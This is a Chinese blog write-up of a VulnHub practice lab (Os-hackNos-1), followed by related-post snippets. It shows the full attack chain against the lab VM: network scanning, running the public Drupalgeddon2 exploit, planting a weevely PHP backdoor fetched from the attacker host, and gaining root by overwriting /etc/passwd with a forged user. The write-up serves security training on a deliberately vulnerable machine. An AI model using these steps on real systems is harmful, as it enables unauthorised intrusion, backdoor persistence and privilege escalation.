Os-hackNos-1靶机

最新推荐文章于 2023-06-16 03:45:02 发布
最新推荐文章于 2023-06-16 03:45:02 发布
阅读量330 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46062722/article/details/109602770
版权

实验主机

靶机:192.168.9.43
kali Linux:192.168.9.16
实验网络:桥接网络

信息收集

查看kali的IP地址

ifconfig

在这里插入图片描述

在kali上主机发现

命令:nmap -sP 192.168.9.0/24

在这里插入图片描述

搜索到靶机的IP地址为192.168.9.43
我们进行端口扫描

命令:nmap -A -v 192.168.9.43

在这里插入图片描述

发现22端口和80端口开着
然后我们在浏览器上访问80端口192.168.9.43
在这里插入图片描述

下面进行目录遍历

命令:dirb http://192.168.9.43

在这里插入图片描述

发现http://192.168.9.43/drupal/profiles/minimal/目录下的minimal.Info文件里drupal版本号为7.57
在这里插入图片描述

然后我们在百度搜索一下,打开第二个链接
在这里插入图片描述

接下来我们就需要下载这个脚本并运行拿到网站的WEBshell
下载地址:https://github.com/dreadlocked/Drupalgeddon2

获取目标网站的WEBshell

在kali中下载

git clone https://github.com/dreadlocked/Drupalgeddon2

在这里插入图片描述

安装依赖包

gem install highline

在这里插入图片描述运行这个安装包

./drupalgeddon2.rb http://192.168.9.43/drupal/

在这里插入图片描述
在这里插入图片描述

连接上shell之后,发现权限太小,我们进一步提权

权限维持

创建小马

weevely generate niu ./703.php

在这里插入图片描述
在这里插入图片描述

下载创建的小马

wget http://192.168.9.16:8080/703.php

在这里插入图片描述

连接成功

weevely http://192.168.9.43/drupal/703.php niu

在这里插入图片描述

提权

下面我们伪造一个用户,把它添加到靶机的passwd文件
在靶机的etc目录下把passwd文件下载到本机

file_download passwd /root/桌面/passwd

在这里插入图片描述

把密码生成md5,我的密码是niu,用户名也是niu

openssl passwd -1 -salt salt niu

在这里插入图片描述

然后把生成的md5码
添加在下载的本机的passwd文件最后一行 在这里插入图片描述

下面把靶机的passwd替换掉

wget http://192.168.9.16:8080/passwd -O passwd

在这里插入图片描述

然后用msf5
进入msf5

 msfconsole
 search drupal

在这里插入图片描述

使用第四个,进入到第四个模块

 use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述

修改rhosts:靶机地址
targeturi 修改为/drupal

show options
set rhosts 192.168.9.43
set targeturi /drupal
run

在这里插入图片描述
在这里插入图片描述

shell
pyhon3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

切换用户

su niu

在这里插入图片描述

OK 提权成功

DF。
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
OS-HACKNOS-1
LainWith的博客
12-25 1037
目录介绍信息收集主机发现方法1网站探测目录扫描gobuster目录扫描查看drupal版本搜索EXPRCE-信息收集反弹shell目标1获取james的账密切换身份方法2网站探测dirb 目录扫描dirbuster挖掘drupal目录获取账号密码登录网站msf拿session提权目标2参考 介绍 难度:容易 ——> 中 flag: 两个, 一个是普通用户的user.txt、另外一个是root用户的user.txt 靶机的地址:https://www.vulnhub.com/entry/hacknos-
靶机Hacknos-1
weixin_50815573的博客
02-21 1623
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
vulnhub靶场,Os-hackNos-1
kukudeshuo的博客
07-18 515
vulnhub靶场,Os-hackNos-1 环境准备 攻击机:kali(192.168.58.130) 靶机Os-hackNos-1(192.168.58.156) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.156 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80 浏览器访问目标靶机80端口 就是一个ubuntu系统的默认ht
vulnhub靶机 Os-hackNos-1
qq_52178795的博客
06-16 140
vulnhub靶机 Os-hackNos-1打靶
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
靶机-DC1通关详细过程
最新发布
06-27
靶机-DC1通关详细过程
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机练习-Os-hackNos-1
yyj1781572的博客
11-25 655
vulnhub靶机练习-Os-hackNos-1
Os-hackNos-1
wwxxss
03-05 134
该漏洞与受影响版本中存在本地文件包含漏洞有关,是由于未对/gracemedia-media-player/templates/files/ajax_controller.php文件内require_once($_GET['cfg'])语句中的cfg参数进行合理的校验有关,远程攻击者可利用该漏洞读取/etc/passw等等配置文件的敏感信息。发现一个新用户rhoit,但是我们没有权限进行查看,因此我们需要继续查找有关内容,先去网站目录中查找。可以看见我们提权成功,接着我们首先去flag的家目录看看。
HackNos-Os-hackNos-1靶机过关练习笔记
Abc_Kimball的博客
11-22 777
文章目录练习笔记:一,信息收集二,获取目标的shell三,权限维持四,提权root权限维持: Os-hackNos-1靶机 实验主机:kali linux虚拟机(VM) 实验靶机Os-hackNos-1靶机(Virtualbox) 实验网络:桥接模式 实验难度:简单 flag:1.普通用户的user.txt;2.root用户的user.txt 再深入是root权限维持,就是生成公钥,将kali的公钥放入Os-hackNos-1靶机里生成公钥文件ssh-keygen,后面意外翻车,就是无法成功顺利的在靶机
vulnhub靶机Os-hackNos-1
Long_gone的博客
01-30 728
一、信息收集 首先扫描靶机IP: arp-scan 192.168.1.110 确定靶机IP为:192.168.1.110后,扫描靶机端口开放情况: nmap -sV -p 0-65535 192.168.1.110 可以看见靶机只开放了22和80端口,然后先访问一下80端口看一下: 是一个Apache2的页面,除此之外就没发现什么其他的东西了,然后再扫描一下目录看看会有什么发现: di...
oscp——Os-hackNos-1
王嘟嘟的博客
02-03 913
0x00 前言 这个是第十九台机子了,感觉有点感觉了,但是还是差一点东西。 54ix5aW96ICB5amG 链接 https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 0x01 信息收集 ip 端口 0x02 攻击 1.端口 端口无果 2.web 访问80端口 然后进行目录遍历,可以看到一个是一个drupal的cms 先判断下版本 ...
hackNos: Player v1.1靶机渗透
siaowei44的博客
07-26 484
概述 该靶机 下载地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/ 准备事项:在vulnhub下载的靶机很多时候都无法获得ip地址,这个问题困扰我很久,今天我探寻到一个有效的解决办法https://blog.csdn.net/asstart/article/details/103433065?utm_source=app ip地址 操作系统 靶机 192.168.74.198 Ubuntu 攻击主机 .
【VulnHub】Os-hackNos-1复盘
redwand的博客
02-15 447
实验通过drupal的一个RCE漏洞入手getshell,随后在机器上发现错配的suid命令wget,最终使用wget覆盖靶机/etc/passwd方式提权成功。注意要点:在信息收集时候,注意扫描敏感txt文件,本实验通过CHANGELOG.txt确定drupal版本7.57。
vulnhub靶机Os-hackNos
timesleep的博客
12-13 484
我们的靶机IP为192.168.34.152 kali的IP为192.168.34.175 我们先扫描 我们访问一下80顺带扫一下目录 我们看到有drupal我们先看一下是什么版本 然后我们查了一个exp 好我们把他下载出来 git clone https://github.com/dreadlocked/Drupalgeddon2.git gem install highline ./...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值